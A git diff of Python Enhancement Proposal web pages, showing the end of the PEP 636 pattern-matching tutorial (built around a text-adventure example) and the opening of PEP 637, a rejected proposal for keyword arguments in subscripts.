Python-Dev list
+
Status:
+
Final
+
Type:
+
Informational
+
Created:
+
12-Sep-2020
+
Python-Version:
+
3.10
+
Post-History:
+
22-Oct-2020, 08-Feb-2021
+
Resolution:
+
Python-Committers message
+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP is a tutorial for the pattern matching introduced by PEP 634.

+

PEP 622 proposed syntax for pattern matching, which received detailed discussion +both from the community and the Steering Council. A frequent concern was +about how easy it would be to explain (and learn) this feature. This PEP +addresses that concern providing the kind of document which developers could use +to learn about pattern matching in Python.

+

This is considered supporting material for PEP 634 (the technical specification +for pattern matching) and PEP 635 (the motivation and rationale for having pattern +matching and design considerations).

+

For readers who are looking more for a quick review than for a tutorial, +see Appendix A.

+
+
+

Tutorial

+

As an example to motivate this tutorial, you will be writing a text adventure. That is +a form of interactive fiction where the user enters text commands to interact with a +fictional world and receives text descriptions of what happens. Commands will be +simplified forms of natural language like get sword, attack dragon, go north, +enter shop or buy cheese.

+
+

Matching sequences

+

Your main loop will need to get input from the user and split it into words, let’s say +a list of strings like this:

+
command = input("What are you doing next? ")
+# analyze the result of command.split()
+
+
+

The next step is to interpret the words. Most of our commands will have two words: an +action and an object. So you may be tempted to do the following:

+
[action, obj] = command.split()
+... # interpret action, obj
+
+
+

The problem with that line of code is that it’s missing something: what if the user +types more or fewer than 2 words? To prevent this problem you can either check the length +of the list of words, or capture the ValueError that the statement above would raise.

+

You can use a matching statement instead:

+
match command.split():
+    case [action, obj]:
+        ... # interpret action, obj
+
+
+

The match statement evaluates the “subject” (the value after the match +keyword), and checks it against the pattern (the code next to case). A pattern +is able to do two different things:

+
    +
  • Verify that the subject has certain structure. In your case, the [action, obj] +pattern matches any sequence of exactly two elements. This is called matching
  • +
  • It will bind some names in the pattern to component elements of your subject. In +this case, if the list has two elements, it will bind action = subject[0] and +obj = subject[1].
  • +
+

If there’s a match, the statements inside the case block will be executed with the +bound variables. If there’s no match, nothing happens and the statement after +match is executed next.

+

Note that, in a similar way to unpacking assignments, you can use either parenthesis, +brackets, or just comma separation as synonyms. So you could write case action, obj +or case (action, obj) with the same meaning. All forms will match any sequence (for +example lists or tuples).

+
+
+

Matching multiple patterns

+

Even if most commands have the action/object form, you might want to have user commands +of different lengths. For example, you might want to add single verbs with no object like +look or quit. A match statement can (and is likely to) have more than one +case:

+
match command.split():
+    case [action]:
+        ... # interpret single-verb action
+    case [action, obj]:
+        ... # interpret action, obj
+
+
+

The match statement will check patterns from top to bottom. If the pattern doesn’t +match the subject, the next pattern will be tried. However, once the first +matching pattern is found, the body of that case is executed, and all further +cases are ignored. This is similar to the way that an if/elif/elif/... +statement works.

+
+
+

Matching specific values

+

Your code still needs to look at the specific actions and conditionally execute +different logic depending on the specific action (e.g., quit, attack, or buy). +You could do that using a chain of if/elif/elif/..., or using a dictionary of +functions, but here we’ll leverage pattern matching to solve that task. Instead of a +variable, you can use literal values in patterns (like "quit", 42, or None). +This allows you to write:

+
match command.split():
+    case ["quit"]:
+        print("Goodbye!")
+        quit_game()
+    case ["look"]:
+        current_room.describe()
+    case ["get", obj]:
+        character.get(obj, current_room)
+    case ["go", direction]:
+        current_room = current_room.neighbor(direction)
+    # The rest of your commands go here
+
+
+

A pattern like ["get", obj] will match only 2-element sequences that have a first +element equal to "get". It will also bind obj = subject[1].

+

As you can see in the go case, we also can use different variable names in +different patterns.

+

Literal values are compared with the == operator except for the constants True, +False and None which are compared with the is operator.

+
+
+

Matching multiple values

+

A player may be able to drop multiple items by using a series of commands +drop key, drop sword, drop cheese. This interface might be cumbersome, and +you might like to allow dropping multiple items in a single command, like +drop key sword cheese. In this case you don’t know beforehand how many words will +be in the command, but you can use extended unpacking in patterns in the same way that +they are allowed in assignments:

+
match command.split():
+    case ["drop", *objects]:
+        for obj in objects:
+            character.drop(obj, current_room)
+    # The rest of your commands go here
+
+
+

This will match any sequences having “drop” as its first elements. All remaining +elements will be captured in a list object which will be bound to the objects +variable.

+

This syntax has similar restrictions as sequence unpacking: you can not have more than one +starred name in a pattern.

+
+
+

Adding a wildcard

+

You may want to print an error message saying that the command wasn’t recognized when +all the patterns fail. You could use the feature we just learned and write +case [*ignored_words] as your last pattern. There’s however a much simpler way:

+
match command.split():
+    case ["quit"]: ... # Code omitted for brevity
+    case ["go", direction]: ...
+    case ["drop", *objects]: ...
+    ... # Other cases
+    case _:
+        print(f"Sorry, I couldn't understand {command!r}")
+
+
+

This special pattern which is written _ (and called wildcard) always +matches but it doesn’t bind any variables.

+

Note that this will match any object, not just sequences. As such, it only makes +sense to have it by itself as the last pattern (to prevent errors, Python will stop +you from using it before).

+
+
+

Composing patterns

+

This is a good moment to step back from the examples and understand how the patterns +that you have been using are built. Patterns can be nested within each other, and we +have been doing that implicitly in the examples above.

+

There are some “simple” patterns (“simple” here meaning that they do not contain other +patterns) that we’ve seen:

+
    +
  • Capture patterns (stand-alone names like direction, action, objects). We +never discussed these separately, but used them as part of other patterns.
  • +
  • Literal patterns (string literals, number literals, True, False, and +None)
  • +
  • The wildcard pattern _
  • +
+

Until now, the only non-simple pattern we have experimented with is the sequence pattern. +Each element in a sequence pattern can in fact be +any other pattern. This means that you could write a pattern like +["first", (left, right), _, *rest]. This will match subjects which are a sequence of at +least three elements, where the first one is equal to "first" and the second one is +in turn a sequence of two elements. It will also bind left=subject[1][0], +right=subject[1][1], and rest = subject[3:]

+
+
+

Or patterns

+

Going back to the adventure game example, you may find that you’d like to have several +patterns resulting in the same outcome. For example, you might want the commands +north and go north to be equivalent. You may also desire to have aliases for +get X, pick up X and pick X up for any X.

+

The | symbol in patterns combines them as alternatives. You could for example write:

+
match command.split():
+    ... # Other cases
+    case ["north"] | ["go", "north"]:
+        current_room = current_room.neighbor("north")
+    case ["get", obj] | ["pick", "up", obj] | ["pick", obj, "up"]:
+        ... # Code for picking up the given object
+
+
+

This is called an or pattern and will produce the expected result. Patterns are +tried from left to right; this may be relevant to know what is bound if more than +one alternative matches. An important restriction when writing or patterns is that all +alternatives should bind the same variables. So a pattern [1, x] | [2, y] is not +allowed because it would make unclear which variable would be bound after a successful +match. [1, x] | [2, x] is perfectly fine and will always bind x if successful.

+
+
+

Capturing matched sub-patterns

+

The first version of our “go” command was written with a ["go", direction] pattern. +The change we did in our last version using the pattern ["north"] | ["go", "north"] +has some benefits but also some drawbacks in comparison: the latest version allows the +alias, but also has the direction hardcoded, which will force us to actually have +separate patterns for north/south/east/west. This leads to some code duplication, but at +the same time we get better input validation, and we will not be getting into that +branch if the command entered by the user is "go figure!" instead of a direction.

+

We could try to get the best of both worlds doing the following (I’ll omit the aliased +version without “go” for brevity):

+
match command.split():
+    case ["go", ("north" | "south" | "east" | "west")]:
+        current_room = current_room.neighbor(...)
+        # how do I know which direction to go?
+
+
+

This code is a single branch, and it verifies that the word after “go” is really a +direction. But the code moving the player around needs to know which one was chosen and +has no way to do so. What we need is a pattern that behaves like the or pattern but at +the same time does a capture. We can do so with an as pattern:

+
match command.split():
+    case ["go", ("north" | "south" | "east" | "west") as direction]:
+        current_room = current_room.neighbor(direction)
+
+
+

The as-pattern matches whatever pattern is on its left-hand side, but also binds the +value to a name.

+
+
+

Adding conditions to patterns

+

The patterns we have explored above can do some powerful data filtering, but sometimes +you may wish for the full power of a boolean expression. Let’s say that you would actually +like to allow a “go” command only in a restricted set of directions based on the possible +exits from the current_room. We can achieve that by adding a guard to our +case. Guards consist of the if keyword followed by any expression:

+
match command.split():
+    case ["go", direction] if direction in current_room.exits:
+        current_room = current_room.neighbor(direction)
+    case ["go", _]:
+        print("Sorry, you can't go that way")
+
+
+

The guard is not part of the pattern, it’s part of the case. It’s only checked if +the pattern matches, and after all the pattern variables have been bound (that’s why the +condition can use the direction variable in the example above). If the pattern +matches and the condition is truthy, the body of the case executes normally. If the +pattern matches but the condition is falsy, the match statement proceeds to check the +next case as if the pattern hadn’t matched (with the possible side-effect of +having already bound some variables).

+
+
+

Adding a UI: Matching objects

+

Your adventure is becoming a success and you have been asked to implement a graphical +interface. Your UI toolkit of choice allows you to write an event loop where you can get a new +event object by calling event.get(). The resulting object can have different type and +attributes according to the user action, for example:

+
    +
  • A KeyPress object is generated when the user presses a key. It has a key_name +attribute with the name of the key pressed, and some other attributes regarding modifiers.
  • +
  • A Click object is generated when the user clicks the mouse. It has an attribute +position with the coordinates of the pointer.
  • +
  • A Quit object is generated when the user clicks on the close button for the game +window.
  • +
+

Rather than writing multiple isinstance() checks, you can use patterns to recognize +different kinds of objects, and also apply patterns to its attributes:

+
match event.get():
+    case Click(position=(x, y)):
+        handle_click_at(x, y)
+    case KeyPress(key_name="Q") | Quit():
+        game.quit()
+    case KeyPress(key_name="up arrow"):
+        game.go_north()
+    ...
+    case KeyPress():
+        pass # Ignore other keystrokes
+    case other_event:
+        raise ValueError(f"Unrecognized event: {other_event}")
+
+
+

A pattern like Click(position=(x, y)) only matches if the type of the event is +a subclass of the Click class. It will also require that the event has a position +attribute that matches the (x, y) pattern. If there’s a match, the locals x and +y will get the expected values.

+

A pattern like KeyPress(), with no arguments will match any object which is an +instance of the KeyPress class. Only the attributes you specify in the pattern are +matched, and any other attributes are ignored.

+
+
+

Matching positional attributes

+

The previous section described how to match named attributes when doing an object match. +For some objects it could be convenient to describe the matched arguments by position +(especially if there are only a few attributes and they have a “standard” ordering). +If the classes that you are using are named tuples or dataclasses, you can do that by +following the same order that you’d use when constructing an object. For example, if +the UI framework above defines their class like this:

+
from dataclasses import dataclass
+
+@dataclass
+class Click:
+    position: tuple
+    button: Button
+
+
+

then you can rewrite your match statement above as:

+
match event.get():
+    case Click((x, y)):
+        handle_click_at(x, y)
+
+
+

The (x, y) pattern will be automatically matched against the position +attribute, because the first argument in the pattern corresponds to the first +attribute in your dataclass definition.

+

Other classes don’t have a natural ordering of their attributes so you’re required to +use explicit names in your pattern to match with their attributes. However, it’s possible +to manually specify the ordering of the attributes allowing positional matching, like in +this alternative definition:

+
class Click:
+    __match_args__ = ("position", "button")
+    def __init__(self, pos, btn):
+        self.position = pos
+        self.button = btn
+        ...
+
+
+

The __match_args__ special attribute defines an explicit order for your attributes +that can be used in patterns like case Click((x,y)).

+
+
+

Matching against constants and enums

+

Your pattern above treats all mouse buttons the same, and you have decided that you +want to accept left-clicks, and ignore other buttons. While doing so, you notice that +the button attribute is typed as a Button which is an enumeration built with +enum.Enum. You can in fact match against enumeration values like this:

+
match event.get():
+    case Click((x, y), button=Button.LEFT):  # This is a left click
+        handle_click_at(x, y)
+    case Click():
+        pass  # ignore other clicks
+
+
+

This will work with any dotted name (like math.pi). However an unqualified name (i.e. +a bare name with no dots) will be always interpreted as a capture pattern, so avoid +that ambiguity by always using qualified constants in patterns.

+
+
+

Going to the cloud: Mappings

+

You have decided to make an online version of your game. All +of your logic will be in a server, and the UI in a client which will communicate using +JSON messages. Via the json module, those will be mapped to Python dictionaries, +lists and other builtin objects.

+

Our client will receive a list of dictionaries (parsed from JSON) of actions to take, +each element looking for example like these:

+
    +
  • {"text": "The shop keeper says 'Ah! We have Camembert, yes sir'", "color": "blue"}
  • +
  • If the client should make a pause {"sleep": 3}
  • +
  • To play a sound {"sound": "filename.ogg", "format": "ogg"}
  • +
+

Until now, our patterns have processed sequences, but there are patterns to match +mappings based on their present keys. In this case you could use:

+
for action in actions:
+    match action:
+        case {"text": message, "color": c}:
+            ui.set_text_color(c)
+            ui.display(message)
+        case {"sleep": duration}:
+            ui.wait(duration)
+        case {"sound": url, "format": "ogg"}:
+            ui.play(url)
+        case {"sound": _, "format": _}:
+            warning("Unsupported audio format")
+
+
+

The keys in your mapping pattern need to be literals, but the values can be any +pattern. As in sequence patterns, all subpatterns have to match for the general +pattern to match.

+

You can use **rest within a mapping pattern to capture additional keys in +the subject. Note that if you omit this, extra keys in the subject will be +ignored while matching, i.e. the message +{"text": "foo", "color": "red", "style": "bold"} will match the first pattern +in the example above.

+
+
+

Matching builtin classes

+

The code above could use some validation. Given that messages came from an external +source, the types of the field could be wrong, leading to bugs or security issues.

+

Any class is a valid match target, and that includes built-in classes like bool +str or int. That allows us to combine the code above with a class pattern. +So instead of writing {"text": message, "color": c} we can use +{"text": str() as message, "color": str() as c} to ensure that message and c +are both strings. For many builtin classes (see PEP 634 for the whole list), you can +use a positional parameter as a shorthand, writing str(c) rather than str() as c. +The fully rewritten version looks like this:

+
for action in actions:
+    match action:
+        case {"text": str(message), "color": str(c)}:
+            ui.set_text_color(c)
+            ui.display(message)
+        case {"sleep": float(duration)}:
+            ui.wait(duration)
+        case {"sound": str(url), "format": "ogg"}:
+            ui.play(url)
+        case {"sound": _, "format": _}:
+            warning("Unsupported audio format")
+
+
+
+
+
+

Appendix A – Quick Intro

+

A match statement takes an expression and compares its value to successive +patterns given as one or more case blocks. This is superficially +similar to a switch statement in C, Java or JavaScript (and many +other languages), but much more powerful.

+

The simplest form compares a subject value against one or more literals:

+
def http_error(status):
+    match status:
+        case 400:
+            return "Bad request"
+        case 404:
+            return "Not found"
+        case 418:
+            return "I'm a teapot"
+        case _:
+            return "Something's wrong with the Internet"
+
+
+

Note the last block: the “variable name” _ acts as a wildcard and +never fails to match.

+

You can combine several literals in a single pattern using | (“or”):

+
case 401 | 403 | 404:
+    return "Not allowed"
+
+
+

Patterns can look like unpacking assignments, and can be used to bind +variables:

+
# point is an (x, y) tuple
+match point:
+    case (0, 0):
+        print("Origin")
+    case (0, y):
+        print(f"Y={y}")
+    case (x, 0):
+        print(f"X={x}")
+    case (x, y):
+        print(f"X={x}, Y={y}")
+    case _:
+        raise ValueError("Not a point")
+
+
+

Study that one carefully! The first pattern has two literals, and can +be thought of as an extension of the literal pattern shown above. But +the next two patterns combine a literal and a variable, and the +variable binds a value from the subject (point). The fourth +pattern captures two values, which makes it conceptually similar to +the unpacking assignment (x, y) = point.

+

If you are using classes to structure your data +you can use the class name followed by an argument list resembling a +constructor, but with the ability to capture attributes into variables:

+
from dataclasses import dataclass
+
+@dataclass
+class Point:
+    x: int
+    y: int
+
+def where_is(point):
+    match point:
+        case Point(x=0, y=0):
+            print("Origin")
+        case Point(x=0, y=y):
+            print(f"Y={y}")
+        case Point(x=x, y=0):
+            print(f"X={x}")
+        case Point():
+            print("Somewhere else")
+        case _:
+            print("Not a point")
+
+
+

You can use positional parameters with some builtin classes that provide an +ordering for their attributes (e.g. dataclasses). You can also define a specific +position for attributes in patterns by setting the __match_args__ special +attribute in your classes. If it’s set to (“x”, “y”), the following patterns are all +equivalent (and all bind the y attribute to the var variable):

+
Point(1, var)
+Point(1, y=var)
+Point(x=1, y=var)
+Point(y=var, x=1)
+
+
+

Patterns can be arbitrarily nested. For example, if we have a short +list of points, we could match it like this:

+
match points:
+    case []:
+        print("No points")
+    case [Point(0, 0)]:
+        print("The origin")
+    case [Point(x, y)]:
+        print(f"Single point {x}, {y}")
+    case [Point(0, y1), Point(0, y2)]:
+        print(f"Two on the Y axis at {y1}, {y2}")
+    case _:
+        print("Something else")
+
+
+

We can add an if clause to a pattern, known as a “guard”. If the +guard is false, match goes on to try the next case block. Note +that value capture happens before the guard is evaluated:

+
match point:
+    case Point(x, y) if x == y:
+        print(f"Y=X at {x}")
+    case Point(x, y):
+        print(f"Not on the diagonal")
+
+
+

Several other key features:

+
    +
  • Like unpacking assignments, tuple and list patterns have exactly the +same meaning and actually match arbitrary sequences. An important +exception is that they don’t match iterators or strings. +(Technically, the subject must be an instance of +collections.abc.Sequence.)
  • +
  • Sequence patterns support wildcards: [x, y, *rest] and (x, y, +*rest) work similar to wildcards in unpacking assignments. The +name after * may also be _, so (x, y, *_) matches a sequence +of at least two items without binding the remaining items.
  • +
  • Mapping patterns: {"bandwidth": b, "latency": l} captures the +"bandwidth" and "latency" values from a dict. Unlike sequence +patterns, extra keys are ignored. A wildcard **rest is also +supported. (But **_ would be redundant, so it is not allowed.)
  • +
  • Subpatterns may be captured using the as keyword:
    case (Point(x1, y1), Point(x2, y2) as p2): ...
    +
    +
    +
  • +
  • Most literals are compared by equality, however the singletons True, +False and None are compared by identity.
  • +
  • Patterns may use named constants. These must be dotted names +to prevent them from being interpreted as capture variable:
    from enum import Enum
    +class Color(Enum):
    +    RED = 0
    +    GREEN = 1
    +    BLUE = 2
    +
    +match color:
    +    case Color.RED:
    +        print("I see red!")
    +    case Color.GREEN:
    +        print("Grass is green")
    +    case Color.BLUE:
    +        print("I'm feeling the blues :(")
    +
    +
    +
  • +
+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0636.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0637/index.html b/pep-0637/index.html new file mode 100644 index 00000000000..be4f3d33744 --- /dev/null +++ b/pep-0637/index.html @@ -0,0 +1,1216 @@ + + + + + + + + PEP 637 – Support for indexing with keyword arguments | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 637 – Support for indexing with keyword arguments

+
+
Author:
+
Stefano Borini
+
Sponsor:
+
Steven D’Aprano
+
Discussions-To:
+
Python-Ideas list
+
Status:
+
Rejected
+
Type:
+
Standards Track
+
Created:
+
24-Aug-2020
+
Python-Version:
+
3.10
+
Post-History:
+
23-Sep-2020
+
Resolution:
+
Python-Dev thread
+
+
+
+
Table of Contents +
+
+

Note

+

This PEP has been rejected. In general, the cost of introducing new syntax +was not outweighed by the perceived benefits. See the link in the Resolution +header field for details.

+
+
+

Abstract

+

At present keyword arguments are allowed in function calls, but not in +item access. This PEP proposes that Python be extended to allow keyword +arguments in item access.

+

The following example shows keyword arguments for ordinary function calls:

+
>>> val = f(1, 2, a=3, b=4)
+
+
+

The proposal would extend the syntax to allow a similar construct +to indexing operations:

+
>>> val = x[1, 2, a=3, b=4]  # getitem
+>>> x[1, 2, a=3, b=4] = val  # setitem
+>>> del x[1, 2, a=3, b=4]    # delitem
+
+
+

and would also provide appropriate semantics. Single- and double-star unpacking of +arguments is also provided:

+
>>> val = x[*(1, 2), **{a=3, b=4}]  # Equivalent to above.
+
+
+

This PEP is a successor to PEP 472, which was rejected due to lack of +interest in 2019. Since then there’s been renewed interest in the feature.

+
+
+

Overview

+
+

Background

+

PEP 472 was opened in 2014. The PEP detailed various use cases and was created by +extracting implementation strategies from a broad discussion on the +python-ideas mailing list, although no clear consensus was reached on which strategy +should be used. Many corner cases have been examined more closely and felt +awkward, backward incompatible or both.

+

The PEP was eventually rejected in 2019 [1] mostly +due to lack of interest for the feature despite its 5 years of existence.

+

However, with the introduction of type hints in PEP 484 the +square bracket notation has been used consistently to enrich the typing +annotations, e.g. to specify a list of integers as Sequence[int]. Additionally, +there has been an expanded growth of packages for data analysis such as pandas +and xarray, which use names to describe columns in a table (pandas) or axis in +an nd-array (xarray). These packages allow users to access specific data by +names, but cannot currently use index notation ([]) for this functionality.

+

As a result, a renewed interest in a more flexible syntax that would allow for +named information has been expressed occasionally in many different threads on +python-ideas, recently by Caleb Donovick [2] in 2019 and Andras +Tantos [3] in 2020. These requests prompted a strong activity on the +python-ideas mailing list, where the various options have been re-discussed and +a general consensus on an implementation strategy has now been reached.

+
+
+

Use cases

+

The following practical use cases present different cases where a keyword +specification would improve notation and provide additional value:

+
    +
  1. To provide a more communicative meaning to the index, preventing e.g. accidental +inversion of indexes:
    >>> grid_position[x=3, y=5, z=8]
    +>>> rain_amount[time=0:12, location=location]
    +>>> matrix[row=20, col=40]
    +
    +
    +
  2. +
  3. To enrich the typing notation with keywords, especially during the use of generics:
    def function(value: MyType[T=int]):
    +
    +
    +
  4. +
  5. In some domain, such as computational physics and chemistry, the use of a +notation such as Basis[Z=5] is a Domain Specific Language notation to represent +a level of accuracy:
    >>> low_accuracy_energy = computeEnergy(molecule, BasisSet[Z=3])
    +
    +
    +
  6. +
  7. Pandas currently uses a notation such as:
    >>> df[df['x'] == 1]
    +
    +
    +

    which could be replaced with df[x=1].

    +
  8. +
  9. xarray has named dimensions. Currently these are handled with functions .isel:
    >>> data.isel(row=10)  # Returns the tenth row
    +
    +
    +

    which could also be replaced with data[row=10]. A more complex example:

    +
    >>> # old syntax
    +>>> da.isel(space=0, time=slice(None, 2))[...] = spam
    +>>> # new syntax
    +>>> da[space=0, time=:2] = spam
    +
    +
    +

    Another example:

    +
    >>> # old syntax
    +>>> ds["empty"].loc[dict(lon=5, lat=6)] = 10
    +>>> # new syntax
    +>>> ds["empty"][lon=5, lat=6] = 10
    +
    +>>> # old syntax
    +>>> ds["empty"].loc[dict(lon=slice(1, 5), lat=slice(3, None))] = 10
    +>>> # new syntax
    +>>> ds["empty"][lon=1:5, lat=6:] = 10
    +
    +
    +
  10. +
  11. Functions/methods whose argument is another function (plus its +arguments) need some way to determine which arguments are destined for +the target function, and which are used to configure how they run the +target. This is simple (if non-extensible) for positional parameters, +but we need some way to distinguish these for keywords. [4]

    An indexed notation would afford a Pythonic way to pass keyword +arguments to these functions without cluttering the caller’s code.

    +
    >>> # Let's start this example with basic syntax without keywords.
    +>>> # the positional values are arguments to `func` while
    +>>> # `name=` is processed by `trio.run`.
    +>>> trio.run(func, value1, value2, name="func")
    +>>> # `trio.run` ends up calling `func(value1, value2)`.
    +
    +>>> # If we want/need to pass value2 by keyword (keyword-only argument,
    +>>> # additional arguments that won't break backwards compatibility ...),
    +>>> # currently we need to resort to functools.partial:
    +>>> trio.run(functools.partial(func, param2=value2), value1, name="func")
    +>>> trio.run(functools.partial(func, value1, param2=value2), name="func")
    +
    +>>> # One possible workaround is to convert `trio.run` to an object
    +>>> # with a `__call__` method, and use an "option" helper,
    +>>> trio.run.option(name="func")(func, value1, param2=value2)
    +>>> # However, foo(bar)(baz) is uncommon and thus disruptive to the reader.
    +>>> # Also, you need to remember the name of the `option` method.
    +
    +>>> # This PEP allows us to replace `option` with `__getitem__`.
    +>>> # The call is now shorter, more mnemonic, and looks+works like typing
    +>>> trio.run[name="func"](func, value1, param2=value2)
    +
    +
    +
  12. +
  13. Availability of star arguments would benefit PEP 646 Variadic Generics, +especially in the forms a[*x] and a[*x, *y, p, q, *z]. The PEP details +exactly this notation in its “Unpacking: Star Operator” section.
  14. +
+

It is important to note that how the notation is interpreted is up to the +implementation. This PEP only defines and dictates the behavior of Python +regarding passed keyword arguments, not how these arguments should be +interpreted and used by the implementing class.

+
+
+

Current status of indexing operation

+

Before detailing the new syntax and semantics to the indexing notation, it is +relevant to analyse how the indexing notation works today, in which contexts, +and how it is different from a function call.

+

Subscripting obj[x] is, effectively, an alternate and specialised form of +function call syntax with a number of differences and restrictions compared to +obj(x). The current Python syntax focuses exclusively on position to express +the index, and also contains syntactic sugar to refer to non-punctiform +selection (slices). Some common examples:

+
>>> a[3]       # returns the fourth element of 'a'
+>>> a[1:10:2]  # slice notation (extract a non-trivial data subset)
+>>> a[3, 2]    # multiple indexes (for multidimensional arrays)
+
+
+

This translates into a __(get|set|del)item__ dunder call which is passed a single +parameter containing the index (for __getitem__ and __delitem__) or two parameters +containing index and value (for __setitem__).

+

The behavior of the indexing call is fundamentally different from a function call +in various aspects:

+

The first difference is in meaning to the reader. A function call says +“arbitrary function call potentially with side-effects”. An indexing operation +says “lookup”, typically to point at a subset or specific sub-aspect of an +entity (as in the case of typing notation). This fundamental difference means +that, while we cannot prevent abuse, implementors should be aware that the +introduction of keyword arguments to alter the behavior of the lookup may +violate this intrinsic meaning.

+

The second difference of the indexing notation compared to a function +is that indexing can be used for both getting and setting operations. +In Python, a function cannot be on the left hand side of an assignment. In +other words, both of these are valid:

+
>>> x = a[1, 2]
+>>> a[1, 2] = 5
+
+
+

but only the first one of these is valid:

+
>>> x = f(1, 2)
+>>> f(1, 2) = 5  # invalid
+
+
+

This asymmetry is important, and makes one understand that there is a natural +imbalance between the two forms. It is therefore not a given that the two +should behave transparently and symmetrically.

+

The third difference is that functions have names assigned to their +arguments, unless the passed parameters are captured with *args, in which case +they end up as entries in the args tuple. In other words, functions already +have anonymous argument semantic, exactly like the indexing operation. However, +__(get|set|del)item__ is not always receiving a tuple as the index argument +(to be uniform in behavior with *args). In fact, given a trivial class:

+
class X:
+    def __getitem__(self, index):
+        print(index)
+
+
+

The index operation basically forwards the content of the square brackets “as is” +in the index argument:

+
>>> x=X()
+>>> x[0]
+0
+>>> x[0, 1]
+(0, 1)
+>>> x[(0, 1)]
+(0, 1)
+>>>
+>>> x[()]
+()
+>>> x[{1, 2, 3}]
+{1, 2, 3}
+>>> x["hello"]
+hello
+>>> x["hello", "hi"]
+('hello', 'hi')
+
+
+

The fourth difference is that the indexing operation knows how to convert +colon notations to slices, thanks to support from the parser. This is valid:

+
a[1:3]
+
+
+

this one isn’t:

+
f(1:3)
+
+
+

The fifth difference is that there’s no zero-argument form. This is valid:

+
f()
+
+
+

this one isn’t:

+
a[]
+
+
+
+
+
+

Specification

+

Before describing the specification, it is important to stress the difference in +nomenclature between positional index, final index and keyword argument, as it is important to +understand the fundamental asymmetries at play. The __(get|set|del)item__ +is fundamentally an indexing operation, and the way the element is retrieved, +set, or deleted is through an index, the final index.

+

The current status quo is to directly build the final index from what is passed between +square brackets, the positional index. In other words, what is passed in the +square brackets is trivially used to generate what the code in __getitem__ then uses +for the indicisation operation. As we already saw for the dict, d[1] has a +positional index of 1 and also a final index of 1 (because it’s the element that is +then added to the dictionary) and d[1, 2] has positional index of (1, 2) and +final index also of (1, 2) (because yet again it’s the element that is added to the dictionary). +However, the positional index d[1,2:3] is not accepted by the dictionary, because +there’s no way to transform the positional index into a final index, as the slice object is +unhashable. The positional index is what is currently known as the index parameter in +__getitem__. Nevertheless, nothing prevents to construct a dictionary-like class that +creates the final index by e.g. converting the positional index to a string.

+

This PEP extends the current status quo, and grants more flexibility to +create the final index via an enhanced syntax that combines the positional index +and keyword arguments, if passed.

+

The above brings an important point across. Keyword arguments, in the context of the index +operation, may be used to take indexing decisions to obtain the final index, and therefore +will have to accept values that are unconventional for functions. See for +example use case 1, where a slice is accepted.

+

The successful implementation of this PEP will result in the following behavior:

+
    +
  1. An empty subscript is still illegal, regardless of context (see Rejected Ideas):
    obj[]  # SyntaxError
    +
    +
    +
  2. +
  3. A single index value remains a single index value when passed:
    obj[index]
    +# calls type(obj).__getitem__(obj, index)
    +
    +obj[index] = value
    +# calls type(obj).__setitem__(obj, index, value)
    +
    +del obj[index]
    +# calls type(obj).__delitem__(obj, index)
    +
    +
    +

    This remains the case even if the index is followed by keywords; see point 5 below.

    +
  4. +
  5. Comma-separated arguments are still parsed as a tuple and passed as +a single positional argument:
    obj[spam, eggs]
    +# calls type(obj).__getitem__(obj, (spam, eggs))
    +
    +obj[spam, eggs] = value
    +# calls type(obj).__setitem__(obj, (spam, eggs), value)
    +
    +del obj[spam, eggs]
    +# calls type(obj).__delitem__(obj, (spam, eggs))
    +
    +
    +

    The points above mean that classes which do not want to support keyword +arguments in subscripts need do nothing at all, and the feature is therefore +completely backwards compatible.

    +
  6. +
  7. Keyword arguments, if any, must follow positional arguments:
    obj[1, 2, spam=None, 3]  # SyntaxError
    +
    +
    +

    This is like function calls, where intermixing positional and keyword +arguments give a SyntaxError.

    +
  8. +
  9. Keyword subscripts, if any, will be handled like they are in +function calls. Examples:
    # Single index with keywords:
    +
    +obj[index, spam=1, eggs=2]
    +# calls type(obj).__getitem__(obj, index, spam=1, eggs=2)
    +
    +obj[index, spam=1, eggs=2] = value
    +# calls type(obj).__setitem__(obj, index, value, spam=1, eggs=2)
    +
    +del obj[index, spam=1, eggs=2]
    +# calls type(obj).__delitem__(obj, index, spam=1, eggs=2)
    +
    +# Comma-separated indices with keywords:
    +
    +obj[foo, bar, spam=1, eggs=2]
    +# calls type(obj).__getitem__(obj, (foo, bar), spam=1, eggs=2)
    +
    +obj[foo, bar, spam=1, eggs=2] = value
    +# calls type(obj).__setitem__(obj, (foo, bar), value, spam=1, eggs=2)
    +
    +del obj[foo, bar, spam=1, eggs=2]
    +# calls type(obj).__detitem__(obj, (foo, bar), spam=1, eggs=2)
    +
    +
    +

    Note that:

    +
      +
    • a single positional index will not turn into a tuple +just because one adds a keyword value.
    • +
    • for __setitem__, the same order is retained for index and value. +The keyword arguments go at the end, as is normal for a function +definition.
    • +
    +
  10. +
  11. The same rules apply with respect to keyword subscripts as for +keywords in function calls:
      +
    • the interpreter matches up each keyword subscript to a named parameter +in the appropriate method;
    • +
    • if a named parameter is used twice, that is an error;
    • +
    • if there are any named parameters left over (without a value) when the +keywords are all used, they are assigned their default value (if any);
    • +
    • if any such parameter doesn’t have a default, that is an error;
    • +
    • if there are any keyword subscripts remaining after all the named +parameters are filled, and the method has a **kwargs parameter, +they are bound to the **kwargs parameter as a dict;
    • +
    • but if no **kwargs parameter is defined, it is an error.
    • +
    +
  12. +
  13. Sequence unpacking is allowed inside subscripts:
    obj[*items]
    +
    +
    +

    This allows notations such as [:, *args, :], which could be treated +as [(slice(None), *args, slice(None))]. Multiple star unpacking are +allowed:

    +
    obj[1, *(2, 3), *(4, 5), 6, foo=5]
    +# Equivalent to obj[(1, 2, 3, 4, 5, 6), foo=3)
    +
    +
    +

    The following notation equivalence must be honored:

    +
    obj[*()]
    +# Equivalent to obj[()]
    +
    +obj[*(), foo=3]
    +# Equivalent to obj[(), foo=3]
    +
    +obj[*(x,)]
    +# Equivalent to obj[(x,)]
    +
    +obj[*(x,),]
    +# Equivalent to obj[(x,)]
    +
    +
    +

    Note in particular case 3: sequence unpacking of a single element will +not behave as if only one single argument was passed. A related case is +the following example:

    +
    obj[1, *(), foo=5]
    +# Equivalent to obj[(1,), foo=5]
    +# calls type(obj).__getitem__(obj, (1,), foo=5)
    +
    +
    +

